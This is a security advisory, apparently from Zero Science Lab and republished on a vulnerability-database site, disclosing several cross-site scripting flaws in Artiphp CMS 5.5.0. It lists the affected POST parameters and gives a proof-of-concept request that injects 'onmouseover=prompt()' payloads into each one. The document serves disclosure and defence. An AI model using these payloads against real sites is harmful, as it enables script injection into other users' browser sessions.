Lucene search

K
zeroscienceGjoko KrsticZSL-2012-5090
HistoryMay 16, 2012 - 12:00 a.m.

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

2012-05-1600:00:00
Gjoko Krstic
zeroscience.mk
14

AI Score

6.3

Confidence

High

Title: Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities
Advisory ID: ZSL-2012-5090
Type: Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 16.05.2012

Summary

Artiphp is a content management system (CMS) open and free to create and manage your website.

Description

Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Vendor

Artiphp - <http://www.artiphp.com>

Affected Version

5.5.0 Neo (r422)

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8
MySQL 5.5.20

Vendor Status

N/A

PoC

artiphp_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php&gt;
[2] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5089.php&gt;
[3] <http://cxsecurity.com/issue/WLB-2012050120&gt;
[4] <http://packetstormsecurity.org/files/112804&gt;
[5] <http://www.1337day.com/exploits/18288&gt;
[6] <http://www.securityfocus.com/bid/53586&gt;
[7] <http://secunia.com/advisories/49195&gt;
[8] <http://xforce.iss.net/xforce/xfdb/75689&gt;
[9] <http://www.osvdb.org/show/osvdb/81990&gt;
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-2906&gt;

Changelog

[16.05.2012] - Initial release
[18.05.2012] - Added reference [4], [5], [6], [7] and [8]
[22.05.2012] - Added reference [9]
[26.05.2012] - Added reference [10]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

Vendor: Artiphp
Product web page: http://www.artiphp.com
Affected version: 5.5.0 Neo (r422)

Summary: Artiphp is a content management system (CMS) open and free to create and manage your website.

Desc: Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.


======================================================================================================================
     PARAM				METHOD				SCRIPT
======================================================================================================================

 add_img_name_post			POST		/artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
 asciiart_post				POST		/artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
 expediteur				POST		/artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
 titre_sav				POST		/artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
 z39d27af885b32758ac0e7d4014a61561	POST		/artpublic/recommandation/index.php

======================================================================================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8
           MySQL 5.5.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php


15.05.2012

--


======================================================================================================================


POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2


=====================================================================================================================
</p></body></html>

AI Score

6.3

Confidence

High